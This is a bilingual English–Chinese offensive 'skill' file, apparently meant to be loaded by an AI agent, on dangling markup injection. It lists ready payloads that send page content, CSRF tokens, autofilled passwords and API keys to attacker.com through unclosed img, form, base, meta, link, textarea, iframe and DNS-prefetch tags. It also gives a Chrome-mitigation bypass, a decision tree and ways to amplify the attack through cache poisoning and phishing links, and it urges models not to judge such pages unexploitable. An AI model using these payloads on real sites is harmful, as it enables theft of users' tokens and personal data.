dangling-markup-injection

Compare original and translation side by side

🇺🇸

Original

English

🇨🇳

Translation

Chinese

SKILL: Dangling Markup Injection — Exfiltration Without JavaScript

技能：悬挂标记注入——无需JavaScript的数据窃取

AI LOAD INSTRUCTION: Covers dangling markup exfiltration via unclosed img/form/base/meta/link/table tags, what can be stolen (CSRF tokens, pre-filled form values, sensitive content), browser-specific behavior, and combinations with other attacks. Base models often overlook this technique entirely when CSP blocks scripts, jumping to "not exploitable" — dangling markup is the answer.

AI加载说明：涵盖通过未闭合的img/form/base/meta/link/table标签实现悬挂标记数据窃取、可窃取的内容（CSRF令牌、预填充表单值、敏感内容）、浏览器特定行为，以及与其他攻击的组合使用。当CSP阻止脚本时，基础模型通常会完全忽略这项技术，直接得出「不可利用」的结论——悬挂标记就是解决方案。

0. RELATED ROUTING

0. 相关关联路径

xss-cross-site-scripting when full XSS is possible (no need for dangling markup)
csp-bypass-advanced when CSP blocks JS execution — dangling markup bypasses script restrictions
csrf-cross-site-request-forgery when dangling markup steals CSRF tokens for subsequent CSRF attacks
crlf-injection when CRLF enables HTML injection in HTTP response
web-cache-deception when dangling markup + cache poisoning amplifies the attack

xss-cross-site-scripting 当可实现完整XSS时使用（无需用到悬挂标记）
csp-bypass-advanced 当CSP阻止JS执行时使用——悬挂标记可绕过脚本限制
csrf-cross-site-request-forgery 当悬挂标记窃取到CSRF令牌用于后续CSRF攻击时使用
crlf-injection 当CRLF可在HTTP响应中实现HTML注入时使用
web-cache-deception 当悬挂标记+缓存投毒可放大攻击效果时使用

1. WHEN TO USE DANGLING MARKUP

1. 何时使用悬挂标记

You need dangling markup when ALL of these are true:

You have an HTML injection point (reflected or stored)
JavaScript execution is blocked:
- CSP blocks inline scripts and event handlers
- Sanitizer strips
```
<script>
```
  ,
```
onerror
```
  ,
```
onload
```
  , etc.
- WAF blocks known XSS patterns
The page contains sensitive data AFTER your injection point:
- CSRF tokens
- Pre-filled form values (email, username, API keys)
- Session identifiers in hidden fields
- Sensitive user content

Core insight: You don't need JavaScript to exfiltrate data — you just need the browser to make a request that includes the data in the URL.

当以下所有条件都满足时你需要用到悬挂标记：

你找到了一个HTML注入点（反射型或存储型）
JavaScript执行被阻止：
- CSP拦截了内联脚本和事件处理器
- 清理器移除了
```
<script>
```
  、
```
onerror
```
  、
```
onload
```
  等内容
- WAF拦截了已知的XSS特征
注入点之后的页面包含敏感数据：
- CSRF令牌
- 预填充的表单值（邮箱、用户名、API密钥）
- 隐藏字段中的会话标识符
- 敏感的用户内容

核心逻辑：你不需要JavaScript也能窃取数据——你只需要让浏览器发起一个把数据携带在URL中的请求即可。

2. CORE TECHNIQUE

2. 核心技术原理

Inject an unclosed HTML tag with a

src

href

action

, or similar attribute pointing to your server. The unclosed attribute quote "consumes" all subsequent page content until the browser finds a matching quote.

html

Page before injection:
  <div>Hello USER_INPUT</div>
  <form>
    <input type="hidden" name="csrf" value="SECRET_TOKEN_123">
    <input type="text" name="email" value="user@target.com">
  </form>

Injected payload:
  <img src="https://attacker.com/collect?

Resulting HTML:
  <div>Hello <img src="https://attacker.com/collect?</div>
  <form>
    <input type="hidden" name="csrf" value="SECRET_TOKEN_123">
    <input type="text" name="email" value="user@target.com">
  </form>
  ...rest of page until next matching quote (")...

The browser interprets everything from

https://attacker.com/collect?

until the next

as the URL. The hidden CSRF token and email value become part of the URL query string sent to

attacker.com

注入一个未闭合的HTML标签，其

src

、

href

、

action

或类似属性指向你的服务器。未闭合的属性引号会「吞噬」所有后续页面内容，直到浏览器找到匹配的引号为止。

html

注入前的页面:
  <div>Hello USER_INPUT</div>
  <form>
    <input type="hidden" name="csrf" value="SECRET_TOKEN_123">
    <input type="text" name="email" value="user@target.com">
  </form>

注入的Payload:
  <img src="https://attacker.com/collect?

生成的HTML:
  <div>Hello <img src="https://attacker.com/collect?</div>
  <form>
    <input type="hidden" name="csrf" value="SECRET_TOKEN_123">
    <input type="text" name="email" value="user@target.com">
  </form>
  ...页面剩余内容直到下一个匹配的引号 (")...

浏览器会把从

https://attacker.com/collect?

到下一个

之间的所有内容识别为URL。隐藏的CSRF令牌和邮箱值会成为URL查询字符串的一部分，发送到

attacker.com

。

3. EXFILTRATION VECTORS

3. 数据窃取向量

3.1 Image Tag (Most Common)

3.1 Image标签（最常用）

html

<!-- Double-quote context -->
<img src="https://attacker.com/collect?

<!-- Single-quote context -->
<img src='https://attacker.com/collect?

<!-- Backtick context (IE only, legacy) -->
<img src=`https://attacker.com/collect?

The browser sends a GET request to

attacker.com

with all consumed content as query parameters.

Blocked by:

img-src

CSP directive

html

<!-- 双引号上下文 -->
<img src="https://attacker.com/collect?

<!-- 单引号上下文 -->
<img src='https://attacker.com/collect?

<!-- 反引号上下文（仅IE， legacy环境） -->
<img src=`https://attacker.com/collect?

浏览器会向

attacker.com

发送GET请求，所有被吞噬的内容都会作为查询参数携带。

拦截规则：被

img-src

CSP指令拦截

3.2 Form Action Hijack

3.2 表单Action劫持

html

<form action="https://attacker.com/collect">
<button>Click to continue</button>
<!--

If the page has form elements after the injection point, the next

</form>

closes the attacker's form. All input fields between become part of the attacker's form → submitted to attacker on user interaction.

Blocked by:

form-action

CSP directive

Trick: Even without user interaction, if there's an existing submit button or JavaScript auto-submit, the form submits automatically.

html

<form action="https://attacker.com/collect">
<button>点击继续</button>
<!--

如果注入点之后的页面有表单元素，下一个

</form>

会闭合攻击者注入的表单。两者之间的所有输入字段都会成为攻击者表单的一部分→用户交互时会提交到攻击者服务器。

拦截规则：被

form-action

CSP指令拦截

技巧：即使用户没有交互，如果页面存在已有的提交按钮或者JavaScript自动提交逻辑，表单也会自动提交。

3.3 Base Tag Hijack

3.3 Base标签劫持

html

<base href="https://attacker.com/">

All subsequent relative URLs on the page resolve to attacker's server:

<script src="/js/app.js">

→ loads

https://attacker.com/js/app.js

<a href="/profile">

→ links to

https://attacker.com/profile

<form action="/submit">

→ submits to

https://attacker.com/submit

Blocked by:

base-uri

CSP directive

html

<base href="https://attacker.com/">

页面后续所有相对URL都会解析到攻击者的服务器：

<script src="/js/app.js">

→ 加载

https://attacker.com/js/app.js

<a href="/profile">

→ 链接到

https://attacker.com/profile

<form action="/submit">

→ 提交到

https://attacker.com/submit

拦截规则：被

base-uri

CSP指令拦截

3.4 Meta Refresh Redirect

3.4 Meta刷新重定向

html

<meta http-equiv="refresh" content="0;url=https://attacker.com/collect?

Redirects the entire page to attacker's server with consumed page content in the URL.

Blocked by:

navigate-to

CSP directive (rarely set), some browsers ignore meta refresh when CSP is present.

html

<meta http-equiv="refresh" content="0;url=https://attacker.com/collect?

将整个页面重定向到攻击者服务器，被吞噬的页面内容会携带在URL中。

拦截规则：被

navigate-to

CSP指令（很少配置）拦截，部分浏览器在CSP存在时会忽略meta刷新。

3.5 Link/Stylesheet Exfiltration

3.5 Link/样式表窃取

html

<link rel="stylesheet" href="https://attacker.com/collect?

Browser requests the URL as a CSS resource, leaking consumed content.

Blocked by:

style-src

CSP directive

html

<link rel="stylesheet" href="https://attacker.com/collect?

浏览器会将该URL作为CSS资源请求，泄露被吞噬的内容。

拦截规则：被

style-src

CSP指令拦截

3.6 Table Background (Legacy)

3.6 表格背景（Legacy）

html

<table background="https://attacker.com/collect?

Works in older browsers that support the

background

attribute on table elements.

Blocked by:

img-src

CSP directive

html

<table background="https://attacker.com/collect?

在支持table元素

background

属性的旧版浏览器中生效。

拦截规则：被

img-src

CSP指令拦截

3.7 Video/Audio Poster

3.7 视频/音频封面

html

<video poster="https://attacker.com/collect?
<audio src="https://attacker.com/collect?

Blocked by:

media-src

img-src

CSP directives

html

<video poster="https://attacker.com/collect?
<audio src="https://attacker.com/collect?

拦截规则：被

media-src

img-src

CSP指令拦截

4. WHAT CAN BE STOLEN

4. 可窃取的内容

Target Data	How It Appears in Page	Steal Technique
CSRF token	`<input type="hidden" name="csrf" value="...">`	Dangling `<img src=` before the form
Pre-filled email	`<input value="user@example.com">`	Dangling tag before the input
API keys in page	`var apiKey = "sk-..."` in inline script	Dangling tag before the script block
Session ID in hidden field	`<input name="session" value="...">`	Dangling tag before the form
Auto-filled passwords	Browser auto-fills password field	`<form action=attacker>` with matching input names
OAuth state/tokens	In URL parameters or hidden form fields	Dangling tag on authorization page
Internal URLs/paths	Links, script sources, API endpoints	`<base>` tag hijack captures all relative URLs

目标数据	页面中的存在形式	窃取技术
CSRF令牌	`<input type="hidden" name="csrf" value="...">`	在表单前注入悬挂的 `<img src=`
预填充的邮箱	`<input value="user@example.com">`	在输入框前注入悬挂标签
页面中的API密钥	内联脚本中的 `var apiKey = "sk-..."`	在脚本块前注入悬挂标签
隐藏字段中的会话ID	`<input name="session" value="...">`	在表单前注入悬挂标签
自动填充的密码	浏览器自动填充的密码字段	携带匹配输入名的 `<form action=attacker>`
OAuth状态/令牌	URL参数或隐藏表单字段	授权页面上的悬挂标签
内部URL/路径	链接、脚本源、API端点	`<base>` 标签劫持捕获所有相对URL

5. BROWSER-SPECIFIC BEHAVIOR

5. 浏览器特定行为

Browser	Behavior
Chrome/Chromium	Blocks dangling markup in `<img>` `src` containing `<` or newlines (since Chrome 60). Still allows `<form action>` , `<base>` , `<link>` .
Firefox	More permissive with dangling markup in image sources. Allows newlines in attribute values.
Safari	Similar to Chrome's restrictions. May handle some edge cases differently.
Edge (Chromium)	Same as Chrome behavior.

浏览器	行为
Chrome/Chromium	自Chrome 60起，会拦截 `<img>` `src` 中包含 `<` 或换行的悬挂标记。仍然允许 `<form action>` 、 `<base>` 、 `<link>` 。
Firefox	对图片源中的悬挂标记更宽松，允许属性值中包含换行。
Safari	限制规则与Chrome类似，部分边缘场景处理逻辑不同。
Edge (Chromium)	与Chrome行为一致。

Chrome Mitigation Detail

Chrome防护细节

Chrome blocks navigation/resource load when the URL attribute value contains:

```
<
```
character (indicates HTML tag consumption)
Newline characters (
```
\n
```
,
```
\r
```
)

Bypass: Use

<form action>

instead of

<img src>

— Chrome's block only targets specific tags.

当URL属性值包含以下内容时，Chrome会拦截导航/资源加载：

```
<
```
字符（表示正在吞噬HTML标签）
换行字符(
```
\n
```
,
```
\r
```
)

绕过方法：使用

<form action>

代替

<img src>

——Chrome的拦截仅针对特定标签。

6. ADVANCED TECHNIQUES

6. 高级技巧

6.1 Selective Consumption

6.1 选择性吞噬

Choose quote type strategically: if page uses

for attributes, inject with

(and vice versa) to precisely control where consumption stops.

策略性选择引号类型：如果页面使用

作为属性引号，用

注入（反之亦然），可以精准控制吞噬停止的位置。

6.2 Textarea + Form Combo

6.2 Textarea + 表单组合

<form action="https://attacker.com/collect"><textarea name="data">

— unclosed textarea eats all subsequent HTML as plaintext; form submission sends it to attacker.

<form action="https://attacker.com/collect"><textarea name="data">

——未闭合的textarea会将所有后续HTML作为纯文本吞噬；表单提交时会将内容发送给攻击者。

6.3 Comment / Style Dangling

6.3 注释/样式悬挂

```

```
consumes all content (no exfil, but hides page content)
```
<style>
```
unclosed treats page as CSS; combine with
```
@import url("https://attacker.com/?
```
for exfil

没有闭合
```
-->
```
的
```
<!-- 
```
会吞噬所有内容（无法窃取数据，但可以隐藏页面内容）
未闭合的
```
<style>
```
会将页面视为CSS；结合
```
@import url("https://attacker.com/?
```
实现数据窃取

6.4 Window.name via iframe

6.4 通过iframe实现Window.name窃取

<iframe src="https://target.com/page" name="

— name attribute consumes content, and

window.name

persists across origins after navigation.

<iframe src="https://target.com/page" name="

——name属性会吞噬内容，且

window.name

在跨域导航后仍然会保留。

7. LIMITATIONS

7. 局限性

Limitation	Detail
Same-origin content only	Dangling markup only captures content from the same HTTP response
Quote matching	Consumption stops at the next matching quote character — may not reach target data
CSP img-src/form-action	Strict CSP can block most exfiltration vectors
Chrome's dangling markup mitigation	Blocks `<img src=` with `<` or newlines in URL
Injection point must be before target data	Can only capture content that appears after the injection in HTML source order
Content encoding	URL-unsafe characters in captured content may be mangled

局限性	详情
仅支持同域内容	悬挂标记仅能捕获同一个HTTP响应中的内容
引号匹配限制	吞噬会在下一个匹配的引号字符处停止——可能无法到达目标数据
CSP img-src/form-action限制	严格的CSP可以拦截大多数窃取向量
Chrome的悬挂标记防护	会拦截URL中包含 `<` 或换行的 `<img src=`
注入点必须在目标数据之前	仅能捕获HTML源码顺序中出现在注入点之后的内容
内容编码问题	捕获内容中的URL不安全字符可能会被转义损坏

8. COMBINATION ATTACKS

8. 组合攻击

8.1 Dangling Markup + Open Redirect

8.1 悬挂标记 + 开放重定向

1. Inject <img src="https://target.com/redirect?url=https://attacker.com/collect?
2. Open redirect on target.com makes the request "same-origin" for some CSP checks
3. Redirect sends captured data to attacker

1. 注入 <img src="https://target.com/redirect?url=https://attacker.com/collect?
2. target.com上的开放重定向会让部分CSP检查认为请求是「同域」的
3. 重定向会将捕获的数据发送给攻击者

8.2 Dangling Markup + Cache Poisoning

8.2 悬挂标记 + 缓存投毒

1. Find reflected HTML injection point
2. Inject dangling markup payload
3. If response is cached, ALL users see the dangling markup
4. Tokens/data from all victims exfiltrated

This turns a reflected injection into a stored/persistent attack.

1. 找到反射型HTML注入点
2. 注入悬挂标记Payload
3. 如果响应被缓存，所有用户都会看到该悬挂标记
4. 所有受害者的令牌/数据都会被窃取

这会将反射型注入转化为存储/持久化攻击。

8.3 Dangling Markup + CSRF

8.3 悬挂标记 + CSRF

1. Use dangling markup to steal CSRF token from page
2. Use stolen token to perform CSRF attack
3. Allows CSRF even when tokens are properly implemented

1. 使用悬挂标记从页面窃取CSRF令牌
2. 使用窃取的令牌执行CSRF攻击
3. 即使令牌实现正确也能实现CSRF攻击

8.4 Dangling Markup + Clickjacking

8.4 悬挂标记 + 点击劫持

1. Inject <form action="https://attacker.com/collect"><textarea name="data">
2. Frame the page (if frame-ancestors allows)
3. Trick user into clicking "Submit" via clickjacking overlay
4. Form submits all captured page content to attacker

1. 注入 <form action="https://attacker.com/collect"><textarea name="data">
2. 嵌套页面（如果frame-ancestors允许）
3. 通过点击劫持覆盖层诱导用户点击「提交」
4. 表单会将所有捕获的页面内容提交给攻击者

9. DANGLING MARKUP DECISION TREE

9. 悬挂标记决策树

HTML injection exists but XSS is blocked (CSP/sanitizer/WAF)?
│
├── Identify injection context
│   ├── Inside attribute value? → Break out first: "><img src="https://attacker.com/collect?
│   ├── Inside tag content? → Inject directly: <img src="https://attacker.com/collect?
│   └── Inside script block? → Close script first: </script><img src="...
│
├── What sensitive data exists AFTER injection point?
│   ├── CSRF tokens → HIGH VALUE: steal token → CSRF attack
│   ├── User PII (email, name) → data theft
│   ├── API keys / secrets → account compromise
│   ├── No sensitive data after injection → dangling markup not useful here
│   └── Check different pages — injection may be on a page with sensitive data
│
├── Choose exfiltration vector based on CSP
│   ├── No CSP / lax CSP → <img src="...  (simplest)
│   ├── img-src restricted?
│   │   ├── form-action unrestricted? → <form action="attacker"><textarea name=d>
│   │   ├── base-uri unrestricted? → <base href="attacker">
│   │   └── style-src unrestricted? → <link rel=stylesheet href="...
│   ├── Strict CSP on all directives?
│   │   ├── meta refresh? → <meta http-equiv="refresh" content="0;url=attacker?
│   │   ├── DNS prefetch? → <link rel=dns-prefetch href="//data.attacker.com">
│   │   └── Window.name via iframe? → <iframe name="...
│   └── Nothing works? → dangling markup blocked, try other approaches
│
├── Handle Chrome's dangling markup mitigation
│   ├── Target uses Chrome? → Avoid <img src= with < or newlines
│   ├── Use <form action=> instead (not blocked)
│   ├── Use <base href=> (not blocked)
│   └── Test in Firefox as fallback (more permissive)
│
├── Choose quote type for maximum capture
│   ├── Target data uses double quotes? → Inject with single quote: <img src='...
│   ├── Target data uses single quotes? → Inject with double quote: <img src="...
│   └── Mixed quotes? → Test both, see which captures more useful data
│
└── Amplification
    ├── Response cached? → Poison cache → steal from multiple victims
    ├── Stored injection? → Every page view exfiltrates
    └── Reflected only? → Deliver via phishing link

存在HTML注入但XSS被阻止（CSP/清理器/WAF）？
│
├── 识别注入上下文
│   ├── 在属性值内部？ → 先跳出： "><img src="https://attacker.com/collect?
│   ├── 在标签内容内部？ → 直接注入： <img src="https://attacker.com/collect?
│   └── 在脚本块内部？ → 先关闭脚本： </script><img src="...
│
├── 注入点之后存在什么敏感数据？
│   ├── CSRF令牌 → 高价值：窃取令牌 → 执行CSRF攻击
│   ├── 用户PII（邮箱、姓名） → 数据窃取
│   ├── API密钥/秘钥 → 账号劫持
│   ├── 注入点之后无敏感数据 → 悬挂标记在此处无用
│   └── 检查其他页面——注入点可能存在于包含敏感数据的页面
│
├── 根据CSP选择窃取向量
│   ├── 无CSP / 宽松CSP → <img src="...  （最简单）
│   ├── img-src被限制？
│   │   ├── form-action未限制？ → <form action="attacker"><textarea name=d>
│   │   ├── base-uri未限制？ → <base href="attacker">
│   │   └── style-src未限制？ → <link rel=stylesheet href="...
│   ├── 所有指令都有严格CSP？
│   │   ├── meta刷新可用？ → <meta http-equiv="refresh" content="0;url=attacker?
│   │   ├── DNS预取可用？ → <link rel=dns-prefetch href="//data.attacker.com">
│   │   └── iframe的Window.name可用？ → <iframe name="...
│   └── 所有方法都无效？ → 悬挂标记被阻止，尝试其他方法
│
├── 处理Chrome的悬挂标记防护
│   ├── 目标用户使用Chrome？ → 避免使用包含`<`或换行的`<img src=`
│   ├── 改用 <form action=>（未被拦截）
│   ├── 改用 <base href=>（未被拦截）
│   └──  fallback到Firefox测试（更宽松）
│
├── 选择引号类型实现最大捕获范围
│   ├── 目标数据使用双引号？ → 用单引号注入： <img src='...
│   ├── 目标数据使用单引号？ → 用双引号注入： <img src="...
│   └── 混合引号？ → 两种都测试，看哪种能捕获更多有效数据
│
└── 攻击放大
    ├── 响应被缓存？ → 投毒缓存 → 窃取多个受害者的数据
    ├── 存储型注入？ → 每次页面访问都会窃取数据
    └── 仅反射型？ → 通过钓鱼链接分发

10. TRICK NOTES — WHAT AI MODELS MISS

10. 技巧说明——AI模型容易遗漏的点

Dangling markup is THE answer when CSP blocks scripts but HTML injection exists. Models trained on XSS often conclude "not exploitable" when CSP is strict — dangling markup doesn't need JavaScript.
Chrome's mitigation is tag-specific, not universal:
```
<img src=
```
is mitigated, but
```
<form action=
```
,
```
<base href=
```
,
```
<meta http-equiv=refresh>
```
are NOT. Always try alternative vectors.
Quote type selection is critical: If the page uses
```
"
```
for attributes, inject with
```
'
```
(or vice versa) to control exactly where consumption stops. Wrong quote type = capturing useless content or nothing.
Injection point placement matters enormously: The injection must appear BEFORE the target data in the HTML source. If CSRF token is above your injection point, dangling markup cannot capture it.
<textarea>
is the most underrated vector: An unclosed textarea eats ALL subsequent HTML as plaintext. Combined with form action hijack, it's the most reliable method when img-src is restricted.
Window.name persists across origins: If you can inject an iframe, the
```
name
```
attribute technique is powerful because
```
window.name
```
survives cross-origin navigation — a rare cross-origin data channel.
DNS prefetch exfiltration works even under strict CSP:
```
<link rel=dns-prefetch href="//stolen-data.attacker.com">
```
triggers a DNS lookup that CSP cannot block. Limited to ~253 characters per label, but sufficient for tokens.

当CSP阻止脚本但存在HTML注入时，悬挂标记就是最优解。 基于XSS训练的模型在遇到严格CSP时通常会得出「不可利用」的结论——悬挂标记不需要JavaScript。
Chrome的防护是针对特定标签的，不是通用的:
```
<img src=
```
被防护，但
```
<form action=
```
、
```
<base href=
```
、
```
<meta http-equiv=refresh>
```
没有被防护。始终要尝试替代向量。
引号类型选择至关重要: 如果页面使用
```
"
```
作为属性引号，用
```
'
```
注入（反之亦然）可以精准控制吞噬停止的位置。错误的引号类型=捕获到无用内容或者什么都捕获不到。
注入点位置极其重要: 注入点必须出现在HTML源码中目标数据的前面。如果CSRF令牌在你的注入点上方，悬挂标记无法捕获它。
<textarea>
是最被低估的向量: 未闭合的textarea会将所有后续HTML作为纯文本吞噬。结合表单action劫持，当img-src被限制时，这是最可靠的方法。
Window.name跨域持久化: 如果你可以注入iframe，
```
name
```
属性技术非常强大，因为
```
window.name
```
在跨域导航后仍然保留——这是非常少见的跨域数据通道。
DNS预取窃取即使在严格CSP下也能生效:
```
<link rel=dns-prefetch href="//stolen-data.attacker.com">
```
会触发CSP无法拦截的DNS查询。每个标签限长~253字符，但对于令牌来说足够了。